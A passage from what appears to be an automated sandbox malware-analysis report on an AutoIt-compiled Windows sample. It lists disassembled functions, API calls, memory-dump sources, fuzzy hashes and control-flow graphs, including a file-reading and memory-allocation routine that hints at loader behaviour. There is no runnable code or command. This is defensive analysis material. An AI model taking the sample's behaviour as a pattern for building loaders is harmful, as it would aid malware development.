                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: 3aba6759914c1dc97f7737dd34b9a8a93dbba3b65711ec2e5532f17c4c05366d
                                                                        • Instruction ID: 7c25433e17cf9ee48cefcd458f77e6756b166446ba76148e2383b12939cfbbef
                                                                        • Opcode Fuzzy Hash: 3aba6759914c1dc97f7737dd34b9a8a93dbba3b65711ec2e5532f17c4c05366d
                                                                        • Instruction Fuzzy Hash: 13115AB0304701AFE7258B26EC48F677BBAEBC5B55F10812CF606A62A0DB71DC04CA61
                                                                        Function 00EB6CA9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,I/), ref: 00EB6CB9
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00EB6CCA
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB6CDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID: I/
                                                                        • API String ID: 48322524-530815126
                                                                        • Opcode ID: f86de327efdaf8f154fcb3c43b77675aec03186f59dc4b0bb2e00aa5c26b7be7
                                                                        • Instruction ID: 391491f4e4a069cbeaead9fb20d193d0a989b6a321e9283ca06f2b9b0bfbee70
                                                                        • Opcode Fuzzy Hash: f86de327efdaf8f154fcb3c43b77675aec03186f59dc4b0bb2e00aa5c26b7be7
                                                                        • Instruction Fuzzy Hash: 7BE0D8318154105B82106738EC0D4FA7F6DDB45339F100705F571E11D0E774E90489D5
                                                                        Function 00E83200 Relevance: 1.0, Instructions: 986COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        • Opcode ID: 744100a0e10b4910d7fba305559d9cb8d29d4bf2ddb6db645bd2ee501175313a
                                                                        • Instruction ID: ab089166401362df5a5ee917ac36948bde6da7cd587b8110d20b796608229d9c
                                                                        • Opcode Fuzzy Hash: 744100a0e10b4910d7fba305559d9cb8d29d4bf2ddb6db645bd2ee501175313a
                                                                        • Instruction Fuzzy Hash: EE926C706083419FD724EF28C480B6AB7E1BF88708F14985DE99EAB362D771ED45CB52
                                                                        Function 00E7E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7E959
                                                                        • timeGetTime.WINMM ref: 00E7EBFA
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7ED2E
                                                                        • TranslateMessage.USER32(?), ref: 00E7ED3F
                                                                        • DispatchMessageW.USER32(?), ref: 00E7ED4A
                                                                        • LockWindowUpdate.USER32(00000000), ref: 00E7ED79
                                                                        • DestroyWindow.USER32 ref: 00E7ED85
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7ED9F
                                                                        • Sleep.KERNEL32(0000000A), ref: 00EE5270
                                                                        • TranslateMessage.USER32(?), ref: 00EE59F7
                                                                        • DispatchMessageW.USER32(?), ref: 00EE5A05
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EE5A19
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 2641332412-570651680
                                                                        • Opcode ID: 51e35e464f7f1b4a66d20a9c10c768011068aac147c8a8bd173cfbede73bdce6
                                                                        • Instruction ID: 4dc0f268a6fff83df07dc8f95ea3eac6f8ef9ff20795b3fdc0110cfd37aa6a51
                                                                        • Opcode Fuzzy Hash: 51e35e464f7f1b4a66d20a9c10c768011068aac147c8a8bd173cfbede73bdce6
                                                                        • Instruction Fuzzy Hash: A262E971508384CFD724DF24C885BAA77E5BF48308F14A9ADF94EAB292D771D844CB52
                                                                        Function 00EA5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___createFile.LIBCMT ref: 00EA5EC3
                                                                        • ___createFile.LIBCMT ref: 00EA5F04
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EA5F2D
                                                                        • __dosmaperr.LIBCMT ref: 00EA5F34
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA5F47
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EA5F6A
                                                                        • __dosmaperr.LIBCMT ref: 00EA5F73
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA5F7C
                                                                        • __set_osfhnd.LIBCMT ref: 00EA5FAC
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA6016
                                                                        • __close_nolock.LIBCMT ref: 00EA603C
                                                                        • __chsize_nolock.LIBCMT ref: 00EA606C
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA607E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA6176
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA618B
                                                                        • __close_nolock.LIBCMT ref: 00EA61EB
                                                                          • Part of subcall function 00E9EA9C: CloseHandle.KERNELBASE(00000000,00F1EEF4,00000000,?,00EA6041,00F1EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E9EAEC
                                                                          • Part of subcall function 00E9EA9C: GetLastError.KERNEL32(?,00EA6041,00F1EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E9EAF6
                                                                          • Part of subcall function 00E9EA9C: __free_osfhnd.LIBCMT ref: 00E9EB03
                                                                          • Part of subcall function 00E9EA9C: __dosmaperr.LIBCMT ref: 00E9EB25
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA620D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA6342
                                                                        • ___createFile.LIBCMT ref: 00EA6361
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EA636E
                                                                        • __dosmaperr.LIBCMT ref: 00EA6375
                                                                        • __free_osfhnd.LIBCMT ref: 00EA6395
                                                                        • __invoke_watson.LIBCMT ref: 00EA63C3
                                                                        • __wsopen_helper.LIBCMT ref: 00EA63DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                        • String ID: @
                                                                        • API String ID: 3896587723-2766056989
                                                                        • Opcode ID: 2f99f574d2acc2bf12b477f5fef4b76a3a1443917cab72828040b4739bfc54e7
                                                                        • Instruction ID: 0b6a16542d6fd691b0d9e4725ba683e0a59d0bc9cf52e9f172d6d44d407cc7c2
                                                                        • Opcode Fuzzy Hash: 2f99f574d2acc2bf12b477f5fef4b76a3a1443917cab72828040b4739bfc54e7
                                                                        • Instruction Fuzzy Hash: 5E2204729006099FEF259F68CC857FE7B61EB1B328F285229E521BF2E1C635AD40C751
                                                                        Function 00EBFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _wcscpy.LIBCMT ref: 00EBFA96
                                                                        • _wcschr.LIBCMT ref: 00EBFAA4
                                                                        • _wcscpy.LIBCMT ref: 00EBFABB
                                                                        • _wcscat.LIBCMT ref: 00EBFACA
                                                                        • _wcscat.LIBCMT ref: 00EBFAE8
                                                                        • _wcscpy.LIBCMT ref: 00EBFB09
                                                                        • __wsplitpath.LIBCMT ref: 00EBFBE6
                                                                        • _wcscpy.LIBCMT ref: 00EBFC0B
                                                                        • _wcscpy.LIBCMT ref: 00EBFC1D
                                                                        • _wcscpy.LIBCMT ref: 00EBFC32
                                                                        • _wcscat.LIBCMT ref: 00EBFC47
                                                                        • _wcscat.LIBCMT ref: 00EBFC59
                                                                        • _wcscat.LIBCMT ref: 00EBFC6E
                                                                          • Part of subcall function 00EBBFA4: _wcscmp.LIBCMT ref: 00EBC03E
                                                                          • Part of subcall function 00EBBFA4: __wsplitpath.LIBCMT ref: 00EBC083
                                                                          • Part of subcall function 00EBBFA4: _wcscpy.LIBCMT ref: 00EBC096
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0A9
                                                                          • Part of subcall function 00EBBFA4: __wsplitpath.LIBCMT ref: 00EBC0CE
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0E4
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 2955681530-2806939583
                                                                        • Opcode ID: b6e8129612d954453f91b97233b0109c4ccf6e0cd2f9fe9849866297f9ff2dd2
                                                                        • Instruction ID: d3bc8a926f723c3e6e53676815391b6e14b3d39a93de4e849f9ed3e8c5a5a719
                                                                        • Opcode Fuzzy Hash: b6e8129612d954453f91b97233b0109c4ccf6e0cd2f9fe9849866297f9ff2dd2
                                                                        • Instruction Fuzzy Hash: D6919272504305AFDF20EB54C891F9BB3E8BF84314F049869F959A7292DB34EA44CB92
                                                                        Function 00E73F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E73F86
                                                                        • RegisterClassExW.USER32(00000030), ref: 00E73FB0
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E73FC1
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00E73FDE
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E73FEE
                                                                        • LoadIconW.USER32(000000A9), ref: 00E74004
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E74013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 71cbca9af7477d2d9be7cdf7edc8b186eea931e4f6a5bb7d8380b4dc9ec1b624
                                                                        • Instruction ID: 6826317475fe3add0c08a1b00ef13aede7d87393d12a1a71aa4c606fe2e71bd6
                                                                        • Opcode Fuzzy Hash: 71cbca9af7477d2d9be7cdf7edc8b186eea931e4f6a5bb7d8380b4dc9ec1b624
                                                                        • Instruction Fuzzy Hash: 1821B4B5904218AFDB009FA5EC8ABDDBFB6FB48710F00411AF515A62A0D7B44548DF91
                                                                        Function 00EBBFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00EBBDB4: __time64.LIBCMT ref: 00EBBDBE
                                                                          • Part of subcall function 00E74517: _fseek.LIBCMT ref: 00E7452F
                                                                        • __wsplitpath.LIBCMT ref: 00EBC083
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscpy.LIBCMT ref: 00EBC096
                                                                        • _wcscat.LIBCMT ref: 00EBC0A9
                                                                        • __wsplitpath.LIBCMT ref: 00EBC0CE
                                                                        • _wcscat.LIBCMT ref: 00EBC0E4
                                                                        • _wcscat.LIBCMT ref: 00EBC0F7
                                                                        • _wcscmp.LIBCMT ref: 00EBC03E
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC65D
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC670
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EBC2A1
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EBC338
                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EBC34E
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EBC35F
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EBC371
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 2378138488-0
                                                                        • Opcode ID: f45785a4920c4a759625344b20421b9e5b95d30a847b76011b094246a77d7ad3
                                                                        • Instruction ID: db605038f92ec978789ad7d7ccef589705bab83743e94e20da8b4892984ec134
                                                                        • Opcode Fuzzy Hash: f45785a4920c4a759625344b20421b9e5b95d30a847b76011b094246a77d7ad3
                                                                        • Instruction Fuzzy Hash: 27C13BB1A04129AFDF21DF95CC81EDEB7F9AF48300F1090A6F619F6151DB709A448F61
                                                                        Function 00E73742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 957 e73742-e73762 959 e73764-e73767 957->959 960 e737c2-e737c4 957->960 962 e73769-e73770 959->962 963 e737c8 959->963 960->959 961 e737c6 960->961 964 e737ab-e737b3 DefWindowProcW 961->964 967 e73776-e7377b 962->967 968 e7382c-e73834 PostQuitMessage 962->968 965 e737ce-e737d1 963->965 966 ee1e00-ee1e2e call e72ff6 call e8e312 963->966 970 e737b9-e737bf 964->970 971 e737f6-e7381d SetTimer RegisterWindowMessageW 965->971 972 e737d3-e737d4 965->972 1000 ee1e33-ee1e3a 966->1000 974 ee1e88-ee1e9c call eb4ddd 967->974 975 e73781-e73783 967->975 969 e737f2-e737f4 968->969 969->970 971->969 979 e7381f-e7382a CreatePopupMenu 971->979 976 ee1da3-ee1da6 972->976 977 e737da-e737ed KillTimer call e73847 call e7390f 972->977 974->969 993 ee1ea2 974->993 980 e73836-e73845 call e8eb83 975->980 981 e73789-e7378e 975->981 985 ee1ddc-ee1dfb MoveWindow 976->985 986 ee1da8-ee1daa 976->986 977->969 979->969 980->969 989 ee1e6d-ee1e74 981->989 990 e73794-e73799 981->990 985->969 995 ee1dac-ee1daf 986->995 996 ee1dcb-ee1dd7 SetFocus 986->996 989->964 998 ee1e7a-ee1e83 call eaa5f3 989->998 991 ee1e58-ee1e68 call eb55bd 990->991 992 e7379f-e737a5 990->992 991->969 992->964 992->1000 993->964 995->992 1001 ee1db5-ee1dc6 call e72ff6 995->1001 996->969 998->964 1000->964 1005 ee1e40-ee1e53 call e73847 call e74ffc 1000->1005 1001->969 1005->964
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00E737B3
                                                                        • KillTimer.USER32(?,00000001), ref: 00E737DD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E73800
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7380B
                                                                        • CreatePopupMenu.USER32 ref: 00E7381F
                                                                        • PostQuitMessage.USER32(00000000), ref: 00E7382E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 5e19de463dc1783f2b77a412d7ea5a062d188de314d7b9d3313da8572c772afa
                                                                        • Instruction ID: ae547d6c712c7d9487b6b37dc6c01da567377dfb17f190ae058f06bde5079a69
                                                                        • Opcode Fuzzy Hash: 5e19de463dc1783f2b77a412d7ea5a062d188de314d7b9d3313da8572c772afa
                                                                        • Instruction Fuzzy Hash: A54149F510414EABDB5CAF38DC4ABBB3696FB40310F04A116F90AF2191DB709D40B761
                                                                        Function 00E73E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E73E79
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E73E88
                                                                        • LoadIconW.USER32(00000063), ref: 00E73E9E
                                                                        • LoadIconW.USER32(000000A4), ref: 00E73EB0
                                                                        • LoadIconW.USER32(000000A2), ref: 00E73EC2
                                                                          • Part of subcall function 00E74024: LoadImageW.USER32(00E70000,00000063,00000001,00000010,00000010,00000000), ref: 00E74048
                                                                        • RegisterClassExW.USER32(?), ref: 00E73F30
                                                                          • Part of subcall function 00E73F53: GetSysColorBrush.USER32(0000000F), ref: 00E73F86
                                                                          • Part of subcall function 00E73F53: RegisterClassExW.USER32(00000030), ref: 00E73FB0
                                                                          • Part of subcall function 00E73F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E73FC1
                                                                          • Part of subcall function 00E73F53: InitCommonControlsEx.COMCTL32(?), ref: 00E73FDE
                                                                          • Part of subcall function 00E73F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E73FEE
                                                                          • Part of subcall function 00E73F53: LoadIconW.USER32(000000A9), ref: 00E74004
                                                                          • Part of subcall function 00E73F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E74013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: 49c652837e7316f36d18bad33e77e47bb906701a96d40b1f115c75ba6ba5cdb9
                                                                        • Instruction ID: 6b17f5c9e36470b0c0b0f2d19271305a2bfeed391c6676090fd050c3f294c10e
                                                                        • Opcode Fuzzy Hash: 49c652837e7316f36d18bad33e77e47bb906701a96d40b1f115c75ba6ba5cdb9
                                                                        • Instruction Fuzzy Hash: 942147B0D04308AFDB14EFA9EC45A99BFF6FB48320F10812AE615A72A0D7754544EF91
                                                                        Function 017CE9E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1021 17ce9e0-17cea8e call 17cc400 1024 17cea95-17ceabb call 17cf8f0 CreateFileW 1021->1024 1027 17ceabd 1024->1027 1028 17ceac2-17cead2 1024->1028 1029 17cec0d-17cec11 1027->1029 1035 17cead9-17ceaf3 VirtualAlloc 1028->1035 1036 17cead4 1028->1036 1031 17cec53-17cec56 1029->1031 1032 17cec13-17cec17 1029->1032 1037 17cec59-17cec60 1031->1037 1033 17cec19-17cec1c 1032->1033 1034 17cec23-17cec27 1032->1034 1033->1034 1038 17cec29-17cec33 1034->1038 1039 17cec37-17cec3b 1034->1039 1040 17ceafa-17ceb11 ReadFile 1035->1040 1041 17ceaf5 1035->1041 1036->1029 1042 17cecb5-17cecca 1037->1042 1043 17cec62-17cec6d 1037->1043 1038->1039 1046 17cec3d-17cec47 1039->1046 1047 17cec4b 1039->1047 1048 17ceb18-17ceb58 VirtualAlloc 1040->1048 1049 17ceb13 1040->1049 1041->1029 1044 17ceccc-17cecd7 VirtualFree 1042->1044 1045 17cecda-17cece2 1042->1045 1050 17cec6f 1043->1050 1051 17cec71-17cec7d 1043->1051 1044->1045 1046->1047 1047->1031 1052 17ceb5f-17ceb7a call 17cfb40 1048->1052 1053 17ceb5a 1048->1053 1049->1029 1050->1042 1054 17cec7f-17cec8f 1051->1054 1055 17cec91-17cec9d 1051->1055 1061 17ceb85-17ceb8f 1052->1061 1053->1029 1056 17cecb3 1054->1056 1057 17cec9f-17ceca8 1055->1057 1058 17cecaa-17cecb0 1055->1058 1056->1037 1057->1056 1058->1056 1062 17ceb91-17cebc0 call 17cfb40 1061->1062 1063 17cebc2-17cebd6 call 17cf950 1061->1063 1062->1061 1069 17cebd8 1063->1069 1070 17cebda-17cebde 1063->1070 1069->1029 1071 17cebea-17cebee 1070->1071 1072 17cebe0-17cebe4 CloseHandle 1070->1072 1073 17cebfe-17cec07 1071->1073 1074 17cebf0-17cebfb VirtualFree 1071->1074 1072->1071 1073->1024 1073->1029 1074->1073
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017CEAB1
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017CECD7
